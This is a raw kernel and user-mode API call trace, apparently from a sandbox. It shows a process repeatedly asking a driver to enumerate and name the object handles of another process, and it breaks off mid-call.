KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.862] ObReferenceObjectByHandle (in: Handle=0x2bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001076c50, HandleInformation=0x0) returned 0x0 [0221.862] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.862] PsReleaseProcessExitSynchronization () returned 0x2 [0221.862] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.862] ObQueryNameString (in: Object=0xfffff8a001076c50, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.862] ObfDereferenceObject (Object=0xfffff8a001076c50) returned 0x1 [0221.862] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.862] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.862] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.862] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.862] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.862] PsAcquireProcessExitSynchronization () returned 0x0 [0221.862] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.862] ObReferenceObjectByHandle (in: Handle=0x2c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00184c750, HandleInformation=0x0) returned 0x0 [0221.862] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.862] PsReleaseProcessExitSynchronization () returned 0x2 [0221.863] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.863] ObQueryNameString (in: Object=0xfffff8a00184c750, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.863] ObfDereferenceObject (Object=0xfffff8a00184c750) returned 0x1 [0221.863] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.863] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.863] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.863] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.863] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.863] PsAcquireProcessExitSynchronization () returned 0x0 [0221.863] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.863] ObReferenceObjectByHandle (in: Handle=0x2c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0013dca30, HandleInformation=0x0) returned 0x0 [0221.863] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.863] PsReleaseProcessExitSynchronization () returned 0x2 [0221.863] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.863] ObQueryNameString (in: Object=0xfffff8a0013dca30, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.863] ObfDereferenceObject (Object=0xfffff8a0013dca30) returned 0x1 [0221.863] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.863] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.863] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.863] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.863] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.863] PsAcquireProcessExitSynchronization () returned 0x0 [0221.863] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.863] ObReferenceObjectByHandle (in: Handle=0x2d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001418e70, HandleInformation=0x0) returned 0x0 [0221.863] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.864] PsReleaseProcessExitSynchronization () returned 0x2 [0221.864] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.864] ObQueryNameString (in: Object=0xfffff8a001418e70, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.864] ObfDereferenceObject (Object=0xfffff8a001418e70) returned 0x1 [0221.864] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.864] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.864] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.864] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.864] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.864] PsAcquireProcessExitSynchronization () returned 0x0 [0221.864] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.864] ObReferenceObjectByHandle (in: Handle=0x2dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001465720, HandleInformation=0x0) returned 0x0 [0221.864] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.864] PsReleaseProcessExitSynchronization () returned 0x2 [0221.864] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.864] ObQueryNameString (in: Object=0xfffff8a001465720, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.864] ObfDereferenceObject (Object=0xfffff8a001465720) returned 0x1 [0221.864] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.864] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.864] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.864] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.864] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.864] PsAcquireProcessExitSynchronization () returned 0x0 [0221.864] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.864] ObReferenceObjectByHandle (in: Handle=0x2e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00146ba30, HandleInformation=0x0) returned 0x0 [0221.864] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.865] PsReleaseProcessExitSynchronization () returned 0x2 [0221.865] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.865] ObQueryNameString (in: Object=0xfffff8a00146ba30, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.865] ObfDereferenceObject (Object=0xfffff8a00146ba30) returned 0x1 [0221.865] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.865] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.865] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.865] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.865] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.865] PsAcquireProcessExitSynchronization () returned 0x0 [0221.865] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.865] ObReferenceObjectByHandle (in: Handle=0x2e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001497fc0, HandleInformation=0x0) returned 0x0 [0221.865] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.865] PsReleaseProcessExitSynchronization () returned 0x2 [0221.865] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.865] ObQueryNameString (in: Object=0xfffff8a001497fc0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.865] ObfDereferenceObject (Object=0xfffff8a001497fc0) returned 0x1 [0221.865] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.865] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.865] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.865] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.866] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.866] PsAcquireProcessExitSynchronization () returned 0x0 [0221.866] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.866] ObReferenceObjectByHandle (in: Handle=0x2e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0013f87f0, HandleInformation=0x0) returned 0x0 [0221.866] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.866] PsReleaseProcessExitSynchronization () returned 0x2 [0221.866] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.866] ObQueryNameString (in: Object=0xfffff8a0013f87f0, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.866] ObfDereferenceObject (Object=0xfffff8a0013f87f0) returned 0x1 [0221.866] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.866] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.866] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.866] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.866] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.866] PsAcquireProcessExitSynchronization () returned 0x0 [0221.866] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.866] ObReferenceObjectByHandle (in: Handle=0x2ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0013f8d60, HandleInformation=0x0) returned 0x0 [0221.866] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.866] PsReleaseProcessExitSynchronization () returned 0x2 [0221.866] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.866] ObQueryNameString (in: Object=0xfffff8a0013f8d60, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.866] ObfDereferenceObject (Object=0xfffff8a0013f8d60) returned 0x1 [0221.866] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.867] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.867] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.867] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.867] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.867] PsAcquireProcessExitSynchronization () returned 0x0 [0221.867] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.867] ObReferenceObjectByHandle (in: Handle=0x2f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001346780, HandleInformation=0x0) returned 0x0 [0221.867] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.867] PsReleaseProcessExitSynchronization () returned 0x2 [0221.867] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.867] ObQueryNameString (in: Object=0xfffff8a001346780, ObjectNameInfo=0xfffffa800307c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.867] ObfDereferenceObject (Object=0xfffff8a001346780) returned 0x1 [0221.867] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.867] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.867] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.867] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.867] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.867] PsAcquireProcessExitSynchronization () returned 0x0 [0221.867] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.867] ObReferenceObjectByHandle (in: Handle=0x2f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0010ed060, HandleInformation=0x0) returned 0x0 [0221.867] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.867] PsReleaseProcessExitSynchronization () returned 0x2 [0221.867] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.867] ObQueryNameString (in: Object=0xfffff8a0010ed060, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.867] ObfDereferenceObject (Object=0xfffff8a0010ed060) returned 0x1 [0221.867] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.868] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.868] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.868] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.868] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.868] PsAcquireProcessExitSynchronization () returned 0x0 [0221.868] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.868] ObReferenceObjectByHandle (in: Handle=0x308, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00181abb0, HandleInformation=0x0) returned 0x0 [0221.868] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.868] PsReleaseProcessExitSynchronization () returned 0x2 [0221.868] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.868] ObQueryNameString (in: Object=0xfffff8a00181abb0, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.868] ObfDereferenceObject (Object=0xfffff8a00181abb0) returned 0x1 [0221.868] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.868] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.868] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.868] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.868] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.868] PsAcquireProcessExitSynchronization () returned 0x0 [0221.868] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.868] ObReferenceObjectByHandle (in: Handle=0x310, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001581450, HandleInformation=0x0) returned 0x0 [0221.868] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.868] PsReleaseProcessExitSynchronization () returned 0x2 [0221.868] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.869] ObQueryNameString (in: Object=0xfffff8a001581450, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.869] ObfDereferenceObject (Object=0xfffff8a001581450) returned 0x1 [0221.869] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.869] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.869] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.869] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.869] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.869] PsAcquireProcessExitSynchronization () returned 0x0 [0221.869] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.869] ObReferenceObjectByHandle (in: Handle=0x318, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0011f2300, HandleInformation=0x0) returned 0x0 [0221.869] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.869] PsReleaseProcessExitSynchronization () returned 0x2 [0221.869] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.869] ObQueryNameString (in: Object=0xfffff8a0011f2300, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.869] ObfDereferenceObject (Object=0xfffff8a0011f2300) returned 0x1 [0221.869] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.869] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.869] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.869] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.870] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.870] PsAcquireProcessExitSynchronization () returned 0x0 [0221.870] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.870] ObReferenceObjectByHandle (in: Handle=0x320, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b45590, HandleInformation=0x0) returned 0x0 [0221.870] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.870] PsReleaseProcessExitSynchronization () returned 0x2 [0221.870] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.870] ObQueryNameString (in: Object=0xfffff8a000b45590, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.870] ObfDereferenceObject (Object=0xfffff8a000b45590) returned 0x1 [0221.870] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.870] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.870] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.870] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.870] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.870] PsAcquireProcessExitSynchronization () returned 0x0 [0221.870] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.870] ObReferenceObjectByHandle (in: Handle=0x334, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0011706f0, HandleInformation=0x0) returned 0x0 [0221.870] KeUnstackDetachProcess 